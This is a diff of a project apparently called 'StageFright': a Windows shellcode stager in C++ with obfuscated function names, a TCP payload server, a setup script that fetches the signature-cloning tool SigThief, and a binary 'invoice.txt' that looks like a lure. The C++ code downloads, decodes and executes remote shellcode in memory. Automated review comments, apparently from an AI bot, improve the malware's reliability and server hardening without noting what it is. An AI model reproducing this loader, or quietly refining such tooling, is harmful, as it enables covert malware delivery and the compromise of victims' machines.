+    size_t Random6;
+
+    if (Random1(Random2, Random3, Random4, Random5, Random6)) {
+        printf("Binary data received successfully.\n");
+
+        // Print received data size for debugging
+        printf("Received data size: %zu\n", Random6);
+
+        Random7((char*)Random5, Random6, Random9, sizeof(Random9));
+
+        // Allocate executable memory with READ, WRITE permissions
+        LPVOID executableMemory = VirtualAlloc(NULL, Random6, MEM_COMMIT, PAGE_READWRITE);
+        if (executableMemory == NULL) {
+            DWORD error = GetLastError();
+            printf("Error allocating executable memory: %d\n", error);
+            delete[] Random5;
+            return;
+        }
+
+        // Copy binary data to the executable memory
+        memcpy(executableMemory, Random5, Random6);
+
+        // Change the protection to PAGE_EXECUTE_READ
+        DWORD oldProtect;
+        if (!VirtualProtect(executableMemory, Random6, PAGE_EXECUTE_READ, &oldProtect)) {
+            DWORD error = GetLastError();
+            printf("Error changing memory protection: %d\n", error);
+            VirtualFree(executableMemory, 0, MEM_RELEASE);
+            delete[] Random5;
+            return;
+        }
+
+        // Create a function pointer to the shellcode
+        RandomA RandomB = reinterpret_cast<RandomA>(executableMemory);
+
+        // Call the shellcode function
+        printf("Executing shellcode...\n");
+        RandomB();
+
+        // No freeing of allocated memory in this POC
+
+        printf("Shellcode executed successfully.\n");
+
+        // Free allocated memory
+        delete[] Random5;
+    } else {
+        printf("Failed to receive binary data.\n");
+        return;
+    }
+}
+
+
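Review bot: The `nullptr` check after `Random5 = new char[fileSize];` is unreachable, because plain `operator new[]` throws `std::bad_alloc` on failure instead of returning null; either drop the branch or allocate with `new (std::nothrow) char[fileSize]` so the check means something. In the same function `fileSize` is a signed `int` that is compared against the `size_t totalSize` in the `while` condition and used as an array length, so a negative value silently converts to a very large unsigned size; declaring it `uint32_t` (the type `ntohl` actually returns) removes the mixed-sign comparison, e.g. `uint32_t fileSize;`. Both functions `Random1` and `Random7` also lack a header comment describing parameters and return values, and `ENTRYPOINT` ignores the return value of `Random7`.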

BIN
StageFright/StageFright/invoice.txt


+ 8 - 0
StageFright/StageFright/setup.sh

@@ -0,0 +1,8 @@
+#!/bin/bash
+apt update -y
+cd StageFright/Resources/
+apt-get install mingw-w64 -y
+git clone https://github.com/secretsquirrel/SigThief.git
+mv SigThief/ StageFright/Resources/
+pip install pycryptodome
+
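Review bot: The `cd StageFright/Resources/` on the third line is unchecked and changes the working directory, so the later `mv SigThief/ StageFright/Resources/` resolves relative to the new directory and points at a path that most likely does not exist there; the script keeps running regardless because there is no `set -e`. Open with `set -euo pipefail`, write `cd StageFright/Resources/ || exit 1`, and move the clone with a path that is valid from that directory (or drop the `cd` and clone into the target directly). The `git clone` also pulls an unpinned third-party repository at whatever HEAD happens to be, which is a supply-chain exposure for a tool that later executes `sigthief.py`; pin it, e.g. `git -C SigThief checkout <PINNED_COMMIT_SHA>` with the hash recorded in the README.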

+ 69 - 0
StageFright/StageFright/tcp_server.py

@@ -0,0 +1,69 @@
+import socketserver
+import os
+
+class MyHandler(socketserver.BaseRequestHandler):
+    def handle(self):
+        print("Connection received from:", self.client_address)
+
+        try:
+            # Receive file path length
+            path_len_bytes = self.request.recv(8)
+            if not path_len_bytes:
+                print("Error receiving file path length.")
+                return
+
+            path_len = int.from_bytes(path_len_bytes, byteorder='little')  # Change byte order to 'little'
+            print(f"Received file path length: {path_len}")
+
+            # Receive file path
+            file_path_bytes = b""
+            while len(file_path_bytes) < path_len:
+                received_data = self.request.recv(path_len - len(file_path_bytes))
+                if not received_data:
+                    print("Error receiving file path.")
+                    return
+                file_path_bytes += received_data
+
+            file_name = file_path_bytes.decode('utf-8')
+            print("Received file name:", file_name)
+
+            # Check if the file exists
+            file_path = os.path.join(os.getcwd(), file_name)
+            print("Absolute file path:", file_path)
+            if os.path.exists(file_path):
+                print("File found:", file_path)
+
+                # Read file data
+                with open(file_path, 'rb') as file:
+                    file_data = file.read()
+
+                # Print the size before sending
+                file_size = len(file_data)
+                print("Size of file:", file_size)
+
+                # Send file size to the client
+                self.request.sendall(file_size.to_bytes(4, byteorder='big'))
+
+                # Send file data back to the client
+                self.request.sendall(file_data)
+                print("File data sent successfully.")
+
+            else:
+                print("File not found:", file_path)
+                self.request.sendall(b"FILE_NOT_FOUND")
+
+        except Exception as e:
+            print("Error:", str(e))
+            self.request.sendall(b"SERVER_ERROR")
+
+if __name__ == "__main__":
+    host, port = "192.168.1.12", 8080
+    server = socketserver.TCPServer((host, port), MyHandler)
+    print(f"Server listening on {host}:{port}")
+
+    try:
+        server.serve_forever()
+    except KeyboardInterrupt:
+        print("Server shutting down.")
+        server.shutdown()
+
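Review bot: The `file_path = os.path.join(os.getcwd(), file_name)` line builds the path from a client-controlled name with no normalisation, so a name containing `..` segments or an absolute path makes the server read and return any file its process can open, not just files in the serving directory. Resolve the path with `os.path.realpath` and reject anything whose `commonpath` with the base directory is not the base directory itself before the existence check. `path_len` is also read from 8 client bytes with no upper bound, so the receive loop will accumulate as many bytes as the peer cares to send; a cap such as `if path_len > 4096: return` keeps a single connection from holding arbitrary memory.

```python
            # … unchanged: receive path length and file name …
            base_dir = os.path.realpath(os.getcwd())
            file_path = os.path.realpath(os.path.join(base_dir, file_name))
            if os.path.commonpath([base_dir, file_path]) != base_dir:
                print("Rejected path outside serving directory:", file_name)
                return
            # … unchanged: existence check, read and send …
```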
